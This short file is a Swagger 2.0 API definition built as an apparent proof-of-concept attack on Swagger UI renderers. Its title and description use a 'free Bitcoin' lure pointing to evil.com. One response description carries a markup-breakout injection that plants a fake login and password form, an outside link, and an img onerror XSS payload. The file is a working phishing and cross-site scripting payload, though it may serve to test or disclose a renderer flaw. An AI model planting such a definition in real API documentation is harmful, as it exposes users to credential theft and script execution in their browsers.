 
swagger: '2.0'
info:
  title: Get $1000 worth of free Bitcoin
  description: |
    Go to http://evil.com to get FREE BITCOIN
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'"></p></td><h1><a href=http://dk4trin.github.io>CLICK HERE</a><p><input type="text" name="login"><p><input type="text" name="password"><p><input type="submit" value="Send"><p><h4><img src=x onerror=alert('Swagger-XSS')>
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
